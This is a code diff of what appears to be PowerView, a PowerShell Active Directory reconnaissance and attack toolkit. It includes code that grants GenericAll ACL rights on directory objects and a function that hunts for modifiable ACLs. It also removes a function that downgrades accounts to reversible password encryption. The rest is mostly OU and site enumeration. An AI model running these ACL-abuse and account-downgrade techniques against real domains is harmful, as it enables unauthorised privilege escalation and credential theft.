+                            $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType
+                        }
+                    }
+                    else {
+                        # deault to GenericAll rights
+                        $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll'
+                        $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType
+                    }
+
+                    # add all the new ACEs to the specified object directory entry
+                    ForEach ($ACE in $ACEs) {
+                        Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)"
+                        $TargetEntry = $TargetObject.GetDirectoryEntry()
+                        $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl'
+                        $TargetEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)
+                        $TargetEntry.PsBase.CommitChanges()
+                    }
                 }
-                else {
-                    # convert/process the LDAP fields for each result
-                    Convert-LDAPProperty -Properties $_.Properties
+                catch {
+                    Write-Warning "[Add-DomainObjectAcl] Error granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname) : $_"
                 }
             }
-            $Results.dispose()
-            $ObjectSearcher.dispose()
         }
     }
 }
 
 
-function Set-ADObject {
+function Find-InterestingDomainAcl {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Finds object ACLs in the current (or specified) domain with modification
+rights set to non-built in objects.
+
+Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
 
-        Takes a SID, name, or SamAccountName to query for a specified
-        domain object, and then sets a specified 'PropertyName' to a
-        specified 'PropertyValue'.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName  
 
-    .PARAMETER SID
+.DESCRIPTION
 
-        The SID of the domain object you're querying for.
+This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
+and for each returned ACE entry it checks if principal security identifier
+is *-1000 (meaning the account is not built in), and also checks if the rights for
+the ACE mean the object can be modified by the principal. If these conditions are met,
+then the security identifier SID is translated, the domain object is retrieved, and
+additional IdentityReference* information is appended to the output object.
 
-    .PARAMETER Name
+.PARAMETER Domain
 
-        The Name of the domain object you're querying for.
+Specifies the domain to use for the query, defaults to the current domain.
 
-    .PARAMETER SamAccountName
+.PARAMETER ResolveGUIDs
 
-        The SamAccountName of the domain object you're querying for. 
+Switch. Resolve GUIDs to their display names.
 
-    .PARAMETER Domain
+.PARAMETER LDAPFilter
 
-        The domain to query for objects, defaults to the current domain.
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-    .PARAMETER DomainController
+.PARAMETER SearchBase
 
-        Domain controller to reflect LDAP queries through.
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-    .PARAMETER Filter
+.PARAMETER Server
 
-        Additional LDAP filter string for the query.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER PropertyName
+.PARAMETER SearchScope
 
-        The property name to set.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER PropertyValue
+.PARAMETER ResultPageSize
 
-        The value to set for PropertyName
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER PropertyXorValue
+.PARAMETER ServerTimeLimit
 
-        Integer value to binary xor (-bxor) with the current int value.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER ClearValue
+.PARAMETER Tombstone
 
-        Switch. Clear the value of PropertyName
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .PARAMETER PageSize
+.PARAMETER Credential
 
-        The PageSize to set for the LDAP searcher object.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER Credential
+.EXAMPLE
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Find-InterestingDomainAcl
 
-    .EXAMPLE
+Finds interesting object ACLS in the current domain.
 
-        PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName countrycode -PropertyValue 0
-        
-        Set the countrycode for matt.admin to 0
+.EXAMPLE
 
-    .EXAMPLE
+Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
 
-        PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName useraccountcontrol -PropertyXorValue 65536
-        
-        Set the password not to expire on matt.admin
+Finds interesting object ACLS in the ev.testlab.local domain and
+resolves rights GUIDs to display names.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs
+
+.OUTPUTS
+
+PowerView.ACL
+
+Custom PSObject with ACL entries.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.ACL')]
     [CmdletBinding()]
     Param (
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DomainName', 'Name')]
         [String]
-        $SID,
+        $Domain,
 
-        [String]
-        $Name,
+        [Switch]
+        $ResolveGUIDs,
 
         [String]
-        $SamAccountName,
+        [ValidateSet('All', 'ResetPassword', 'WriteMembers')]
+        $RightsFilter,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $Domain,
+        $LDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $DomainController,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $Filter,
+        $Server,
 
-        [Parameter(Mandatory = $True)]
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $PropertyName,
+        $SearchScope = 'Subtree',
 
-        $PropertyValue,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PropertyXorValue,
+        $ServerTimeLimit,
 
         [Switch]
-        $ClearValue,
-
-        [ValidateRange(1,10000)] 
-        [Int]
-        $PageSize = 200,
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    $Arguments = @{
-        'SID' = $SID
-        'Name' = $Name
-        'SamAccountName' = $SamAccountName
-        'Domain' = $Domain
-        'DomainController' = $DomainController
-        'Filter' = $Filter
-        'PageSize' = $PageSize
-        'Credential' = $Credential
-    }
-    # splat the appropriate arguments to Get-ADObject
-    $RawObject = Get-ADObject -ReturnRaw @Arguments
-    
-    try {
-        # get the modifiable object for this search result
-        $Entry = $RawObject.GetDirectoryEntry()
-        
-        if($ClearValue) {
-            Write-Verbose "Clearing value"
-            $Entry.$PropertyName.clear()
-            $Entry.commitchanges()
+    BEGIN {
+        $ACLArguments = @{}
+        if ($PSBoundParameters['ResolveGUIDs']) { $ACLArguments['ResolveGUIDs'] = $ResolveGUIDs }
+        if ($PSBoundParameters['RightsFilter']) { $ACLArguments['RightsFilter'] = $RightsFilter }
+        if ($PSBoundParameters['LDAPFilter']) { $ACLArguments['LDAPFilter'] = $LDAPFilter }
+        if ($PSBoundParameters['SearchBase']) { $ACLArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }
+
+        $ObjectSearcherArguments = @{
+            'Properties' = 'samaccountname,objectclass'
+            'Raw' = $True
+        }
+        if ($PSBoundParameters['Server']) { $ObjectSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ObjectSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ObjectSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ObjectSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ObjectSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ObjectSearcherArguments['Credential'] = $Credential }
+
+        $ADNameArguments = @{}
+        if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
+        if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
+
+        # ongoing list of built-up SIDs
+        $ResolvedSIDs = @{}
+    }
+
+    PROCESS {
+        if ($PSBoundParameters['Domain']) {
+            $ACLArguments['Domain'] = $Domain
+            $ADNameArguments['Domain'] = $Domain
         }
 
-        elseif($PropertyXorValue) {
-            $TypeName = $Entry.$PropertyName[0].GetType().name
+        Get-DomainObjectAcl @ACLArguments | ForEach-Object {
 
-            # UAC value references- https://support.microsoft.com/en-us/kb/305144
-            $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue 
-            $Entry.$PropertyName = $PropertyValue -as $TypeName       
-            $Entry.commitchanges()     
-        }
+            if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) {
+                # only process SIDs > 1000
+                if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\d{3,}$') {
+                    if ($ResolvedSIDs[$_.SecurityIdentifier.Value]) {
+                        $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass = $ResolvedSIDs[$_.SecurityIdentifier.Value]
 
-        else {
-            $Entry.put($PropertyName, $PropertyValue)
-            $Entry.setinfo()
+                        $InterestingACL = New-Object PSObject
+                        $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN
+                        $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier
+                        $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights
+                        if ($_.ObjectAceType) {
+                            $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType
+                        }
+                        else {
+                            $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'
+                        }
+                        $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags
+                        $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType
+                        $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags
+                        $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier
+                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName
+                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain
+                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN
+                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass
+                        $InterestingACL
+                    }
+                    else {
+                        $IdentityReferenceDN = Convert-ADName -Identity $_.SecurityIdentifier.Value -OutputType DN @ADNameArguments
+                        # "IdentityReferenceDN: $IdentityReferenceDN"
+
+                        if ($IdentityReferenceDN) {
+                            $IdentityReferenceDomain = $IdentityReferenceDN.SubString($IdentityReferenceDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                            # "IdentityReferenceDomain: $IdentityReferenceDomain"
+                            $ObjectSearcherArguments['Domain'] = $IdentityReferenceDomain
+                            $ObjectSearcherArguments['Identity'] = $IdentityReferenceDN
+                            # "IdentityReferenceDN: $IdentityReferenceDN"
+                            $Object = Get-DomainObject @ObjectSearcherArguments
+
+                            if ($Object) {
+                                $IdentityReferenceName = $Object.Properties.samaccountname[0]
+                                if ($Object.Properties.objectclass -match 'computer') {
+                                    $IdentityReferenceClass = 'computer'
+                                }
+                                elseif ($Object.Properties.objectclass -match 'group') {
+                                    $IdentityReferenceClass = 'group'
+                                }
+                                elseif ($Object.Properties.objectclass -match 'user') {
+                                    $IdentityReferenceClass = 'user'
+                                }
+                                else {
+                                    $IdentityReferenceClass = $Null
+                                }
+
+                                # save so we don't look up more than once
+                                $ResolvedSIDs[$_.SecurityIdentifier.Value] = $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass
+
+                                $InterestingACL = New-Object PSObject
+                                $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN
+                                $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier
+                                $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights
+                                if ($_.ObjectAceType) {
+                                    $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType
+                                }
+                                else {
+                                    $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'
+                                }
+                                $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags
+                                $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType
+                                $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags
+                                $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier
+                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName
+                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain
+                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN
+                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass
+                                $InterestingACL
+                            }
+                        }
+                        else {
+                            Write-Warning "[Find-InterestingDomainAcl] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with Convert-ADName"
+                        }
+                    }
+                }
+            }
         }
     }
-    catch {
-        Write-Warning "Error setting property $PropertyName to value '$PropertyValue' for object $($RawObject.Properties.samaccountname) : $_"
-    }
 }
 
 
-function Invoke-DowngradeAccount {
+function Get-DomainOU {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Set reversible encryption on a given account and then force the password
-        to be set on next user login. To repair use "-Repair".
+Search for all organization units (OUs) or specific OU objects in AD.
 
-    .PARAMETER SamAccountName
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty  
 
-        The SamAccountName of the domain object you're querying for. 
+.DESCRIPTION
 
-    .PARAMETER Name
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties whencreated,usnchanged,...". By default, all OU objects for
+the current domain are returned.
 
-        The Name of the domain object you're querying for.
+.PARAMETER Identity
 
-    .PARAMETER Domain
+An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). Wildcards accepted.
 
-        The domain to query for objects, defaults to the current domain.
+.PARAMETER GPLink
 
-    .PARAMETER DomainController
+Only return OUs with the specified GUID in their gplink property.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Domain
 
-    .PARAMETER Filter
+Specifies the domain to use for the query, defaults to the current domain.
 
-        Additional LDAP filter string for the query.
+.PARAMETER LDAPFilter
 
-    .PARAMETER Repair
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        Switch. Unset the reversible encryption flag and force password reset flag.
+.PARAMETER Properties
 
-    .PARAMETER Credential
+Specifies the properties of the output object to retrieve from the server.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.PARAMETER SearchBase
 
-    .EXAMPLE
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        PS> Invoke-DowngradeAccount -SamAccountName jason
+.PARAMETER Server
 
-        Set reversible encryption on the 'jason' account and force the password to be changed.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .EXAMPLE
+.PARAMETER SearchScope
 
-        PS> Invoke-DowngradeAccount -SamAccountName jason -Repair
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        Unset reversible encryption on the 'jason' account and remove the forced password change.
-#>
+.PARAMETER ResultPageSize
 
-    [CmdletBinding()]
-    Param (
-        [Parameter(ParameterSetName = 'SamAccountName', Position=0, ValueFromPipeline=$True)]
-        [String]
-        $SamAccountName,
-
-        [Parameter(ParameterSetName = 'Name')]
-        [String]
-        $Name,
+Specifies the PageSize to set for the LDAP searcher object.
 
-        [String]
-        $Domain,
-
-        [String]
-        $DomainController,
+.PARAMETER ServerTimeLimit
 
-        [String]
-        $Filter,
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        [Switch]
-        $Repair,
+.PARAMETER SecurityMasks
 
-        [Management.Automation.PSCredential]
-        $Credential
-    )
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-    process {
-        $Arguments = @{
-            'SamAccountName' = $SamAccountName
-            'Name' = $Name
-            'Domain' = $Domain
-            'DomainController' = $DomainController
-            'Filter' = $Filter
-            'Credential' = $Credential
-        }
+.PARAMETER FindOne
 
-        # splat the appropriate arguments to Get-ADObject
-        $UACValues = Get-ADObject @Arguments | select useraccountcontrol | ConvertFrom-UACValue
+Only return one result object.
 
-        if($Repair) {
+.PARAMETER Tombstone
 
-            if($UACValues.Keys -contains "ENCRYPTED_TEXT_PWD_ALLOWED") {
-                # if reversible encryption is set, unset it
-                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128
-            }
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-            # unset the forced password change
-            Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue -1
-        }
+.PARAMETER Credential
 
-        else {
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-            if($UACValues.Keys -contains "DONT_EXPIRE_PASSWORD") {
-                # if the password is set to never expire, unset
-                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 65536
-            }
+.PARAMETER Raw
 
-            if($UACValues.Keys -notcontains "ENCRYPTED_TEXT_PWD_ALLOWED") {
-                # if reversible encryption is not set, set it
-                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128
-            }
+Switch. Return raw results instead of translating the fields into a custom PSObject.
 
-            # force the password to be changed on next login
-            Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue 0
-        }
-    }
-}
+.EXAMPLE
 
+Get-DomainOU
 
-function Get-ComputerProperty {
-<#
-    .SYNOPSIS
+Returns the current OUs in the domain.
 
-        Returns a list of all computer object properties. If a property
-        name is specified, it returns all [computer:property] values.
+.EXAMPLE
 
-        Taken directly from @obscuresec's post:
-            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+Get-DomainOU *admin* -Domain testlab.local
 
-    .PARAMETER Properties
+Returns all OUs with "admin" in their name in the testlab.local domain.
 
-        Return property names for computers.
+.EXAMPLE
 
-    .PARAMETER Domain
+Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
 
-        The domain to query for computer properties, defaults to the current domain.
+Returns all OUs with linked to the specified group policy object.
 
-    .PARAMETER DomainController
+.EXAMPLE
 
-        Domain controller to reflect LDAP queries through.
+"*admin*","*server*" | Get-DomainOU
 
-    .PARAMETER PageSize
+Search for OUs with the specific names.
 
-        The PageSize to set for the LDAP searcher object.
+.EXAMPLE
 
-    .PARAMETER Credential
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainOU -Credential $Cred
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.OUTPUTS
 
-    .EXAMPLE
+PowerView.OU
 
-        PS C:\> Get-ComputerProperty -Domain testing
-        
-        Returns all user properties for computers in the 'testing' domain.
+Custom PSObject with translated OU property fields.
+#>
 
-    .EXAMPLE
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.OU')]
+    [CmdletBinding()]
+    Param (
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [String[]]
+        $Identity,
 
-        PS C:\> Get-ComputerProperty -Properties ssn,lastlogon,location
-        
-        Returns all an array of computer/ssn/lastlogin/location combinations
-        for computers in the current domain.
+        [ValidateNotNullOrEmpty()]
+        [String]
+        [Alias('GUID')]
+        $GPLink,
 
-    .LINK
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Domain,
 
-        http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
-#>
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
 
-    [CmdletBinding()]
-    param(
+        [ValidateNotNullOrEmpty()]
         [String[]]
         $Properties,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $Domain,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ServerTimeLimit,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
+
+        [Switch]
+        $Tombstone,
+
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [Switch]
+        $Raw
     )
 
-    if($Properties) {
-        # extract out the set of all properties for each object
-        $Properties = ,"name" + $Properties | Sort-Object -Unique
-        Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -Property $Properties
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $OUSearcher = Get-DomainSearcher @SearcherArguments
     }
-    else {
-        # extract out just the property names
-        Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -first 1 | Get-Member -MemberType *Property | Select-Object -Property "Name"
-    }
-}
-
-
-function Find-ComputerField {
-<#
-    .SYNOPSIS
 
-        Searches computer object fields for a given word (default *pass*). Default
-        field being searched is 'description'.
+    PROCESS {
+        if ($OUSearcher) {
+            $IdentityFilter = ''
+            $Filter = ''
+            $Identity | Where-Object {$_} | ForEach-Object {
+                $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                if ($IdentityInstance -match '^OU=.*') {
+                    $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                }
+                else {
+                    try {
+                        $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+                        $IdentityFilter += "(objectguid=$GuidByteString)"
+                    }
+                    catch {
+                        $IdentityFilter += "(name=$IdentityInstance)"
+                    }
+                }
+            }
+            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                $Filter += "(|$IdentityFilter)"
+            }
 
-        Taken directly from @obscuresec's post:
-            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+            if ($PSBoundParameters['GPLink']) {
+                Write-Verbose "[Get-DomainOU] Searching for OUs with $GPLink set in the gpLink property"
+                $Filter += "(gplink=*$GPLink*)"
+            }
 
-    .PARAMETER SearchTerm
+            if ($PSBoundParameters['LDAPFilter']) {
+                Write-Verbose "[Get-DomainOU] Using additional LDAP filter: $LDAPFilter"
+                $Filter += "$LDAPFilter"
+            }
 
-        Term to search for, default of "pass".
+            $OUSearcher.filter = "(&(objectCategory=organizationalUnit)$Filter)"
+            Write-Verbose "[Get-DomainOU] Get-DomainOU filter string: $($OUSearcher.filter)"
 
-    .PARAMETER SearchField
+            if ($PSBoundParameters['FindOne']) { $Results = $OUSearcher.FindOne() }
+            else { $Results = $OUSearcher.FindAll() }
+            $Results | Where-Object {$_} | ForEach-Object {
+                if ($PSBoundParameters['Raw']) {
+                    # return raw result objects
+                    $OU = $_
+                }
+                else {
+                    $OU = Convert-LDAPProperty -Properties $_.Properties
+                }
+                $OU.PSObject.TypeNames.Insert(0, 'PowerView.OU')
+                $OU
+            }
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainOU] Error disposing of the Results object: $_"
+                }
+            }
+            $OUSearcher.dispose()
+        }
+    }
+}
 
-        User field to search in, default of "description".
 
-    .PARAMETER ADSpath
+function Get-DomainSite {
+<#
+.SYNOPSIS
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Search for all sites or specific site objects in AD.
 
-    .PARAMETER Domain
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty  
 
-        Domain to search computer fields for, defaults to the current domain.
+.DESCRIPTION
 
-    .PARAMETER DomainController
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties whencreated,usnchanged,...". By default, all site objects for
+the current domain are returned.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Identity
 
-    .PARAMETER PageSize
+An site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or
+GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER GPLink
 
-    .PARAMETER Credential
+Only return sites with the specified GUID in their gplink property.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.PARAMETER Domain
 
-    .EXAMPLE
+Specifies the domain to use for the query, defaults to the current domain.
 
-        PS C:\> Find-ComputerField -SearchTerm backup -SearchField info
+.PARAMETER LDAPFilter
 
-        Find computer accounts with "backup" in the "info" field.
-#>
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Term')]
-        [String]
-        $SearchTerm = 'pass',
+.PARAMETER Properties
 
-        [Alias('Field')]
-        [String]
-        $SearchField = 'description',
+Specifies the properties of the output object to retrieve from the server.
 
-        [String]
-        $ADSpath,
+.PARAMETER SearchBase
 
-        [String]
-        $Domain,
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        [String]
-        $DomainController,
+.PARAMETER Server
 
-        [ValidateRange(1,10000)] 
-        [Int]
-        $PageSize = 200,
+Specifies an Active Directory server (domain controller) to bind to.
 
-        [Management.Automation.PSCredential]
-        $Credential
-    )
+.PARAMETER SearchScope
 
-    process {
-        Get-NetComputer -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField
-    }
-}
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
+.PARAMETER ResultPageSize
 
-function Get-NetOU {
-<#
-    .SYNOPSIS
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Gets a list of all current OUs in a domain.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER OUName
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        The OU name to query for, wildcards accepted.
+.PARAMETER SecurityMasks
 
-    .PARAMETER GUID
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-        Only return OUs with the specified GUID in their gplink property.
+.PARAMETER Tombstone
 
-    .PARAMETER Domain
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        The domain to query for OUs, defaults to the current domain.
+.PARAMETER FindOne
 
-    .PARAMETER DomainController
+Only return one result object.
 
